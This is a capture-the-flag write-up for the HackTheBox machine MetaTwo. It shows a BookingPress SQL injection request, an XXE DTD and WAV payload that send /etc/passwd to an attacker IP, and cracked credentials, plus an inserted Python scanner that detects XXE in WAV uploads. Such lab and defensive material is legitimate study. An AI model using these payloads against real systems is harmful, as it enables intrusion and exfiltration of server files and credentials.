Hackthebox - MetaTwo

Author: Nauten

Web

Opening the IP in a browser redirects to metapress.htb

Adding the hostname to /etc/hosts and opening the page again

From the proxy log we can see it looks like a WordPress site


WP site?

We see the version of the BookingPress plugin is 1.0.10

Following the instructions in the advisory we can find the nonce and exploit the SQLi:

https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357

We can grab the nonce and use it in the request:

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=5a815c3989&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

Using the SQLi we can dump the wp_users table and get the password for the user manager.

After dumping the DB we get the password partylikearockstar.

After logging in we see we can upload media.

Going back to wpscan we see we can exploit CVE-2021-29447:

https://github.com/motikan2010/CVE-2021-29447

We create a malicious DTD file:

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.36:9999/?p=%file;'>" >

and the WAV payload that pulls it in:

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.13:8888/lfi.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
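
A defender-side check for the upload vector above, as an added example that is not from the writeup: a small Python scanner that walks the RIFF chunks of an uploaded WAV and flags any XML-bearing chunk (the iXML chunk the payload uses, or any other chunk whose body starts with "<") that declares a DOCTYPE, entities or a SYSTEM identifier. The build_wav helper, the two sample files and the attacker.example host are constructed for this example.

```python
import re
import struct

# Markers a legitimate iXML/BWF metadata block never needs; any of them inside
# an XML-bearing chunk is a strong sign of an XXE attempt.
XXE_MARKERS = [
    (re.compile(rb"<!DOCTYPE", re.I), "DOCTYPE declaration"),
    (re.compile(rb"<!ENTITY", re.I), "ENTITY declaration"),
    (re.compile(rb"\bSYSTEM\b"), "SYSTEM identifier (external resource)"),
    (re.compile(rb"%[A-Za-z_][\w.-]*;"), "parameter-entity reference"),
]

def riff_chunks(data: bytes):
    """Yield (fourcc, body) per RIFF chunk: little-endian sizes, even padding.
    A chunk declared longer than the file is yielded truncated, not dropped."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        yield fourcc, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)

def wav_xxe_findings(data: bytes):
    """Scan every chunk whose body looks like XML and report XXE markers."""
    findings = []
    for fourcc, body in riff_chunks(data):
        if not body.lstrip().startswith(b"<"):
            continue  # audio or format data, not XML metadata
        tag = fourcc.decode("ascii", "replace")
        for pattern, label in XXE_MARKERS:
            if pattern.search(body):
                findings.append(f"{tag} chunk contains {label}")
    return findings

def build_wav(chunks):
    """Assemble a minimal RIFF/WAVE file from (fourcc, body) pairs (test helper)."""
    out = b""
    for fourcc, body in chunks:
        out += fourcc + struct.pack("<I", len(body)) + body + b"\0" * (len(body) & 1)
    return b"RIFF" + struct.pack("<I", 4 + len(out)) + b"WAVE" + out

# Constructed samples: a benign iXML block and one carrying a DOCTYPE with an
# external parameter entity (placeholder host, not the address from the writeup).
CLEAN_WAV = build_wav([(b"fmt ", b"\x01\x00\x01\x00" + b"\x00" * 12),
                       (b"iXML", b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>')])
EVIL_WAV = build_wav([(b"iXML", b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % remote '
                               b'SYSTEM "http://attacker.example/evil.dtd">%remote;]>')])
```

The real fix is patching WordPress so the media parser no longer resolves external entities; a scanner like this is a compensating control at the upload boundary or a triage tool for media already sitting in wp-content/uploads.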

With this we grab the ../wp-config.php file, which contains the FTP creds.

On FTP we can get send_mailer.php,

and from it we get the user creds.

Privilege Escalation

In the ~/.passpie folder we find a private GPG key.

Cracking its password with john we get blink182.

Trying to export it we get an error.

Copying root.pass and using passpie export to export it, we get the creds for root,

and we get root.

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/metatwo/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.